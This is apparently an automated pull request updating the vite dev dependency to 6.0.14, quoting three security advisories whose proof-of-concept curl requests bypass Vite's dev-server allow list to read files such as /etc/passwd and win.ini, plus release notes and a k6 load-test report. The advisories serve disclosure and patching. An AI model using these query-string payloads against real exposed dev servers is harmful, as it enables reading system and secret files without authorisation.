Update dependency vite to v6.0.14 [SECURITY]

[openverse-bot]

This PR contains the following updates:

Package	Type	Update	Change
vite (source)	devDependencies	patch	6.0.11 -> 6.0.14

GitHub Vulnerability Alerts

CVE-2025-30208

Summary

The contents of arbitrary files can be returned to the browser.

Impact

Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?raw?? or ?import&raw?? to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as ? are removed in several places, but are not accounted for in query string regexes.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@​fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@&#8203;fs/tmp/secret.txt?import&raw??"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

CVE-2025-31125

Summary

The contents of arbitrary files can be returned to the browser.

Impact

Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.

Details

• base64 encoded content of non-allowed files is exposed using ?inline&import (originally reported as ?import&?inline=1.wasm?init)
• content of non-allowed files is exposed using ?raw?import

/@​fs/ isn't needed to reproduce the issue for files inside the project root.

PoC

Original report (check details above for simplified cases):

The ?import&?inline=1.wasm?init ending allows attackers to read arbitrary files and returns the file content if it exists. Base64 decoding needs to be performed twice

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

Example full URL http://localhost:5173/@​fs/C:/windows/win.ini?import&?inline=1.wasm?init

CVE-2025-31486

Summary

The contents of arbitrary files can be returned to the browser.

Impact

Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected..

Details

.svg

Requests ending with .svg are loaded at this line.
https://github.com/vitejs/vite/blob/037f801075ec35bb6e52145d659f71a23813c48f/packages/vite/src/node/plugins/asset.ts#L285-L290
By adding ?.svg with ?.wasm?init or with sec-fetch-dest: script header, the restriction was able to bypass.

This bypass is only possible if the file is smaller than build.assetsInlineLimit (default: 4kB) and when using Vite 6.0+.

relative paths

The check was applied before the id normalization. This allowed requests to bypass with relative paths (e.g. ../../).

PoC

npm create vite@latest
cd vite-project/
npm install
npm run dev

send request to read etc/passwd

curl 'http://127.0.0.1:5173/etc/passwd?.svg?.wasm?init'

curl 'http://127.0.0.1:5173/@​fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?raw'

---

Release Notes

vitejs/vite (vite)

v6.0.14

Compare Source

Please refer to CHANGELOG.md for details.

v6.0.13

Compare Source

Please refer to CHANGELOG.md for details.

v6.0.12

Compare Source

Please refer to CHANGELOG.md for details.

---

Configuration

📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR has been generated by Renovate Bot.

[github-actions]

Latest k6 run output¹

     ✓ status was 200

     checks.........................: 100.00% ✓ 404      ✗ 0   
     data_received..................: 95 MB   394 kB/s
     data_sent......................: 53 kB   220 B/s
     http_req_blocked...............: avg=59.23µs  min=2.25µs   med=4.9µs    max=3.16ms   p(90)=148.16µs p(95)=214.45µs
     http_req_connecting............: avg=38.72µs  min=0s       med=0s       max=3.11ms   p(90)=99.37µs  p(95)=142.31µs
     http_req_duration..............: avg=148.77ms min=17.55ms  med=93.71ms  max=993.93ms p(90)=346.85ms p(95)=422.52ms
       { expected_response:true }...: avg=148.77ms min=17.55ms  med=93.71ms  max=993.93ms p(90)=346.85ms p(95)=422.52ms
   ✓ http_req_failed................: 0.00%   ✓ 0        ✗ 404 
     http_req_receiving.............: avg=176.22µs min=52.55µs  med=140.98µs max=2.39ms   p(90)=274.57µs p(95)=379.66µs
     http_req_sending...............: avg=25.26µs  min=8.26µs   med=22.33µs  max=120.45µs p(90)=38.56µs  p(95)=47.12µs 
     http_req_tls_handshaking.......: avg=0s       min=0s       med=0s       max=0s       p(90)=0s       p(95)=0s      
     http_req_waiting...............: avg=148.57ms min=17.44ms  med=93.2ms   max=993.65ms p(90)=346.62ms p(95)=422.26ms
     http_reqs......................: 404     1.677625/s
     iteration_duration.............: avg=787.53ms min=203.66ms med=857.17ms max=1.72s    p(90)=1.11s    p(95)=1.48s   
     iterations.....................: 77      0.319745/s
     vus............................: 2       min=0      max=6 
     vus_max........................: 60      min=60     max=60

Footnotes

1. This comment will automatically update with new output each time k6 runs for this PR ↩